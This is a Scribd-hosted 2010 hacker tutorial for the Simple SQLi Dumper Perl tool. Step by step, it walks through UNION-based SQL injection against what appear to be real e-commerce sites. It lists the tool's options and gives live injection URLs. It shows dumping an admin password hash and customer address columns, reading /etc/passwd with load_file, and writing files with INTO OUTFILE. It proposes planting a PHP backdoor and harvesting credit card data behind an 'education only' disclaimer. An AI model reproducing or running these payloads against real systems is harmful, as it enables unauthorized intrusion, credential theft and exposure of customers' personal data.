Scribd
Upload
7K views8 pages

Simple Sqli Dumper

This document introduces the Simple SQLi Dumper (SSDp) tool for finding vulnerabilities in MySQL databases. It provides instructions on downloading and using SSDp to find the database name, tables, columns, and dump data by exploiting SQL injection vulnerabilities. Examples are given to demonstrate finding the magic number, database information, reading and writing files, and brute forcing tables and columns. The document encourages users to only use this tool for educational purposes.

Uploaded by

Alex Rozack
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
7K views8 pages

Simple Sqli Dumper

This document introduces the Simple SQLi Dumper (SSDp) tool for finding vulnerabilities in MySQL databases. It provides instructions on downloading and using SSDp to find the database name, tables, columns, and dump data by exploiting SQL injection vulnerabilities. Examples are given to demonstrate finding the magic number, database information, reading and writing files, and brute forcing tables and columns. The document encourages users to only use this tool for educational purposes.

Uploaded by

Alex Rozack
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 8

SIMPLE SQLI DUMPER V5.

March 22, 2010 by NoGe in Labels:vulnerabilities,linux,tutorial,mixed tutorial


0

[o] attention

USE THIS TOOL FOR EDUCATION PURPOSE ONLY.


WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!

SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )


SSDp How To by NoGe ( mario[at]antisecurity[dot]org )

[o] what is SSDp?

SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.

[o] download SSDp v5.1

http://okedeh.co.tv/ssdp51.tar.gz
http://pacenoge.org/tool/ssdp51.tar.gz

[o] function

- SQL Injection
- Operation System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column

[o] command and option

[root@evilc0de noge]# perl ssdp.pl -h

|-----------------------------------------------------------------------------|
| Usage: perl ssdp.pl [options] |
||
| -u [SQLi URL] target with id parameter or sqli url with c0li string |
| -e [sqli end tag] sql injection end tag (default: "--") |
| -d [database name] this option should not be used (default: @@database) |
| -t [table name] table_name |
| -c [columns name] column_name (example: id,user,pass,email) |
| -s [space code] SPACE code: +,/**/,%20 (default: "+") |
| -f [max field] max field to get magic number (default: 123) |
| -start [num] row number to begin dumping data |
| -stop [num] row number to stop dumping |
| -where [query] your special dumping query |
||
| -info Get MySQL Information [MySQL v4+] |
| -dbase Concat Databases [MySQL v5+] |
| -table Concat Tables [MySQL v5+] |
| -column Concat Columns [MySQL v5+] |
| -tabcol Concat Tables with Columns [MySQL v5+] |
| -find Search Columns Name [MySQL v5+] |
| -magic Find Magic Number [MySQL v4+] |
| -dump Dump Data [MySQL v4+] |
| -brute Fuzzing Tables & Columns [MySQL v4+] |
||
| -log [file name] file name to save ssdp data (default: ssdp.log) |
| -p [http proxy] hostname:port |
|-----------------------------------------------------------------------------|

[o] proof of concept

[0x01] magic number (null column).

first of all we have to find null column (magic number).


null column used for execute our SQL query.

# perl ssdp.pl -u [target URL] -magic

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] URL: http://www.460productions.com/store.php?cat=2


[+] End Tag: --

Attempting to find the magic number...

[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

[+] Field Length : 24


[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?
cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24

Showing MySQL Information ...

[+] Database: 460store


[+] User: [email protected]
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": Yes (w00t)
[+] Create File "/tmp/c0li-430.txt": Yes (w00t)

Done.

our magic number is 1 and it will replace with "c0li" string.


we can see the database information and operation system too.

[0x02] finding table

now we use URL that include "c0li" string on it to find table & column.

# perl ssdp.pl -u [c0li URL] -table

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24 -table

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 18

Showing tables ...

[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)

Done.

that is the list of all table in database()

[0x03] finding column

let's see column from table called "security".

# perl ssdp.pl -u [c0li URL] -t [table] -column

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24 -t security -column

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5

Showing columns from table "security" ...

[+] security(1): user_id,username,password,admin,last_login

Done.

aha! we got column called "username" and "password".


[0x04] dumping data

now we'll see information inside that column.. :)

# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24 -t security -c username,password -dump

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24
[+] SQLi End Tag: --

[+] Database Name: database()


[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1

Dumping Data ...

[1] admin : 2ec20101734c754d

Done.

we got admin username and password hash. :D


ok i have show you how to find magic number, table, column and dump data the column using SSDp.

[0x05] search column name (-find)

now i'll show you how to use -find option (Search Columns Name)
i'll try to search column with keyword "address" it require -c option (column)

# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24 -d 460store -c address -find
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?


cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24
[+] SQLi End Tag: --
[+] Database Name: 460store
[+] Column Name string to search: address

Searching for Columns Path ...

[+] Columns Found:

[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name

Done.

found column with word "address" on table "customer". easy right? :p

[0x06] read & create file (read only)

now let's see Read File (read only) & Create File (read only).
why read only? coz this function design just to test if we can read file or no. to inject, we do it manually.. :(
as you can see at the first time we find magic number you'll find this line.

[+] Read File "/etc/passwd" : Yes (w00t)


[+] Create File "/tmp/c0li-159.txt" : Yes (w00t)

it means we can read (load_file) the /etc/passwd file on a target also we can create file at /tmp directory.
to use load_file you need to convert the /etc/passwd into hexadecimal. http://pacenoge.org/encdec

http://www.460productions.com/store.php?
cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24--

the result will be like this.


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh

let's create some file in /tmp directory. :)

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,"Simple
SQLi Dumper",8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+"/tmp/ssdp.txt"--

URL above means we write "Simple SQLi Dumper" into ssdp.txt that locate at /tmp directory.
to see if it works or no lets read /tmp/ssdp.txt using load_file function. don't forget to convert it first.

http://www.460productions.com/store.php?
cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24--

and you will see result like this.

1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

that the word we write in /tmp/ssdp.txt.


what can we do with create file vuln? we can make a php file as backdoor at the target if we know the
directory path. :))

[0x07] brute MySQL v4

guessing table & column for MySQL v4.


you can add your own table name & column name by editing file called tables.dict & columns.dict.

# perl ssdp.pl -u [c0li URL] -brute

[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?


product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2
1,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.samra.com/product_details.php?


product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2
1,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: --
Finding Tables & Columns ...

[1] admin_user: username,password,email,adminid,adminname,phone,

Done.

found table "admin_user"


found column "username" "password" "email" "adminid" "adminname" "phone"

[0x08] conclusion

by using SSDp, it's very easy to find SQL injection vulnerability at certain vulnerable parameter or string.
this tool also perform SQL injection test to the vulnerable website and try to dump data from MySQL
database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers and etc.
but, i suggest using this tool in a right way. okey dude?? :p

[0x09] references

perl ssdp.pl -h
http://en.wikipedia.org/wiki/SQL_injection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

[0x10] greetz ^^

Vrs-hCk OoN_Boy paman zxvf angel stardustmemory


s4va xr00tb0y S3T4N pizzyroot matthews martfella

[MH] MainHack BrotherHood - [SiD] ServerIsDown UnderGrounD - AntiSecurity.org Team

You might also like